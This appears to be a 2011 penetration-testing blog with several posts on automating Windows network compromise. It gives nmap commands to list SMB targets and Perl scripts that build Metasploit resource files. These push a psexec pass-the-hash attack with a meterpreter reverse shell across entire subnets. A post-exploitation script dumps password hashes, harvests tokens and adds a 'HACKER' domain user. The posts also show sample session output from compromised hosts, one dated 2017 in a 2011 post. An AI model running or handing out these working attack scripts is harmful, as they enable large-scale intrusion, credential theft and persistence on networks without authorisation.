Monday, November 21, 2011

Quick list of Nmap & cut commands

NMap is a powerful tool but can be a bit of a pain when all I need is to get a clean list of live IP addresses. Here is a list of my go-to scripts for narrowing down all possible targets into a list I can pass into Nessus:

Ping a subnet:
nmap -n -sP 172.16.0.0/16 -oG - | cut -d' ' -f2,4 | cut -d' ' -f1 | grep ^[0-9] >> 172.16.txt

From a target list:
nmap -n -sP -iL HQWorkstations.txt -oG - | cut -d' ' -f2,4 | cut -d' ' -f1 | grep ^[0-9] >> HQWork.txt

For a specific port or ports:
nmap -p445 -Pn 192.168.1.1/24 -oG - | grep 445/open | cut -d' ' -f2 >> smb.txt

Get a number of live systems when using -Pn

cat FileName.gnmap | grep "Status: Up" | cut -d' ' -f2 | wc -l

Friday, October 7, 2011

NMap & Pass-the-Hash

Let's speed up pwning the Enterprise another notch. In this scenario, we've obtained an account hash through a Man-in-the-Middle attack using, say, Easy-Creds. In my prior blog posts I showed how to automate a psexec attack across an entire IP range or list. But if the credentials aren't valid on all the targets it can take time to go through the entire range/list, waiting for the authentication to fail, the module to timeout and the 2 second sleep. There has to be a better way and there is.

Nmap supports the use of password hashes:

nmap -n -sT -p445 --script=smb-enum-shares.nse -script-args=smbuser=USER,smbhash=e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c,smbtype=v1,smbdomain=DOMAIN  -oN SMB-User.txt 10.110.10.1/24 --open -vv

HINT: To test using the local user password hashes, use "smbdomain=."

For further information:
(Look at smbtype)

Tuesday, October 4, 2011

A Faster psexec Attack

So, I got some pretty harsh feedback from my first blog post. "You really suck at scripting", they said. "You're a script-kiddie's script-kiddie!", they yelled. "What if I wanted to pass a list of IPs, smart boy? How would you do that?" I tried not to get defensive and replied, "Jeez Mom, relax, I'll come up a solution."

I've been using a perl script that lets me pass-the-hash against all IPs in a subnet range but I updated it to set the rhosts from a file instead. That way once I get a hash I want to try, I can nmap the environment and collect targets with just SMB ports to pass to the attack.

Start by pulling together the targets using nmap and the unix cut command:
nmap -p445 -Pn 192.168.1.1/24 -oG - | grep 445/open | cut -d' ' -f2 >> smb.txt

Then create the perl file that can be compiled into an MSF resource file.
----------------------------------------------------------------------
#!/usr/bin/perl -w
use strict;

my $input_file="smb.txt";
print "use windows/smb/psexec\n";
print "set SMBUser NAME\n";
print "set SMBPass HASH\n";
print "set PAYLOAD windows/meterpreter/reverse_tcp\n";
print "set LHOST XXX.XXX.XXX.XXX\n";
print "set LPORT 4444\n";

 open(IN, $input_file) or die "$input_file\n";
    while(<IN>) {
        chomp;
        print "set RHOST $_\n";
        print "exploit\n";
        print "sleep 2\n";

Thursday, September 22, 2011

Automating the Hack. From Exploit to Domain Admin, Complete Enterprise P0wnage.

I admit it. I'm a script kiddie. I love them. I'm always on the lookout for ways to automate the mundane tasks in a penetration test and for my inaugural blog post I thought I would share a combination of Metasploit scripts I use to eviscerate networks on a large scale. These post-exploitation tools will make short work of controlling as many targets as possible and leverage work by Joshua “Jabra” Abraha and Carlos Perez (darkoperator).

The first script automates Metasploit's psexec module. Once I've obtained a credential or a hash, this script attempts to upload a Meterpreter shell on to every Windows machine in an IP range. The second script allows you to run a resource file against all previously established sessions.

This post assumes you have a working knowledge of Metasploit and you're running it off of BackTrack. You'll need to prep your environment and setup your Metasploit with the required multi_meter_resource.rb file which you can download from here:
https://github.com/darkoperator/Meterpreter-Scripts/blob/89d04cae10b8a351e8c2ba1b60a38f53fe3ef3ed/post/multi/manage/multi_post_resource.rb

Save to /pentest/exploits/framework3/modules/post/multi/manage/multi_post_resource.rb

You will need to create your own post exploitation resource file. I use something like the following:
--------
all sysinfo
all run hashdump
all route
all use incognito
all list_tokens -u
all add_user HACKER Asdf1234! -h DOMAIN-CONTROLLER-IP
--------
Save as /pentest/exploits/framework3/scripts/resource/go.rc


After you've compromised a target with your favorite exploit and pulled a hashdump or obtained a credential through ARP poisoning or some other method, you're ready to automate the psexec attack. The Metasploit psexec module uses a valid administrator username and password or password hash to execute an arbitrary payload. This module is similar to the "psexec" utility provided by SysInternals.


First create a perl file that can be compiled into an MSF resource file.


--------
#!/usr/bin/perl -w
use strict;
print "use windows/smb/psexec\n";
print "set SMBUser USERNAME\n";
print "set SMBPass PASSWORD OR HASH\n";
#As Necessary "set SMBDomain DOMAIN-NAME\n";
print "set PAYLOAD windows/meterpreter/reverse_tcp\n";
print "set LHOST xxx.xxx.xxx.xxx\n";
print "set LPORT 4567\n";
# first range

foreach(1.. 254) {
    print "set RHOST xxx.xxx.xxx.$_\n";
    print "exploit -z\n";
    print "sleep 1\n";
}
--------


Save as /root/psexec.pl


In a command prompt execute:
perl psexec.pl > psexec.rc


Then launch your attack:
msfconsole -r psexec.rc


p0wn for fun and profit (Example):

resource (psexec.rc)> set RHOST xxx.xxx.xxx.194
RHOST => xxx.xxx.xxx.194
resource (psexec.rc)> exploit -z
[*] Started reverse handler on xxx.xxx.xxx.188:4412
[*] Connecting to the server...
[*] Authenticating to xxx.xxx.xxx.194:445|WORKGROUP as user 'USERNAME'...
[*] Uploading payload...
[*] Created \oFMiBmQi.exe...
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:xxx.xxx.xxx.194[\svcctl] ...
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:xxx.xxx.xxx.194[\svcctl] ...
[*] Obtaining a service manager handle...
[*] Creating a new service (hABdqAhk -"MhdWnoVdJaQBUUPAlKFZdgpIloQlkB")...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Removing the service...
[*] Closing service handle...
[*] Deleting \oFMiBmQi.exe...
[*] Sending stage (752128 bytes) to xxx.xxx.xxx.194
[*] Meterpreter session 14 opened (xxx.xxx.xxx.188:4412 -> xxx.xxx.xxx.194:1191) at Wed Aug 24 15:11:16 -0700 2017
[*] Session 14 created in the background.

Allow the script to finish executing against your target ranges and then review the results:

msf  exploit(psexec) > sessions

Active sessions
===============

  Id  Type                   Information                          Connection
  --  ----                   -----------                          ----------
  1   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ HDMORE-DT3  xxx.xxx.xxx.188:4488 -> xxx.xxx.xxx.14:54347
  2   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ DHOLZER-DT        xxx.xxx.xxx.188:4488 -> xxx.xxx.xxx.104:54033
  3   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ RBOWS-LT2     xxx.xxx.xxx.188:4488 -> xxx.xxx.xxx.105:51174
  5   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ JGROSMAN-DT        xxx.xxx.xxx.188:4488 -> xxx.xxx.xxx.107:58424
  6   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ JMCRAY-DT     xxx.xxx.xxx.188:4488 -> xxx.xxx.xxx.116:60363
  8   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ BKREB2-DT       xxx.xxx.xxx.188:4488 -> xxx.xxx.xxx.123:55074
  9   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ ARAHMAN-DT2    xxx.xxx.xxx.188:4488 -> xxx.xxx.xxx.127:59479
  10  meterpreter x86/win32  NT AUTHORITY\SYSTEM @ JSTEELE-LT2    xxx.xxx.xxx.188:4488 -> xxx.xxx.xxx.147:59553

Then load DarkOperator's multi_post_resource.rb module:
msf  exploit(psexec) > use post/multi/manage/multi_post_resource.rb

Then load your resource file:
msf  auxiliary(multi-rc) > set resource /pentest/exploits/framework3/scripts/resource/go.rc

Start the fun!
msf  auxiliary(multi-rc) > run

(Example Output)
[+] Running command sysinfo against sessions 1
System Language : en_US
OS              : Windows 7 (Build 7600).
Computer        : JSTEELE-LT2
Architecture    : x64 (Current Process is WOW64)
Meterpreter     : x86/win32
[+] Running command sysinfo against sessions 2
System Language : en_US
OS              : Windows 7 (Build 7600).
Computer        : JMCRAY-LT3
Architecture    : x64 (Current Process is WOW64)
Meterpreter     : x86/win32
[+] Running command sysinfo against sessions 3
System Language : en_US
OS              : Windows 7 (Build 7601, Service Pack 1).
Computer        : HDMORE-LT
Architecture    : x86
Meterpreter     : x86/win32

This will loop through your entire list of sessions, dump sysinfo, hashes, routes, etc and attempt to add a user to the domain.


For further information:
http://spl0it.wordpress.com/2009/12/17/metasploit-psexec-scanner-via-perl/
http://www.offensive-security.com/metasploit-unleashed/PSexec_Pass_The_Hash
http://www.darkoperator.com/blog/2011/7/13/automating-post-modules-and-meterpreter-across-sessions.html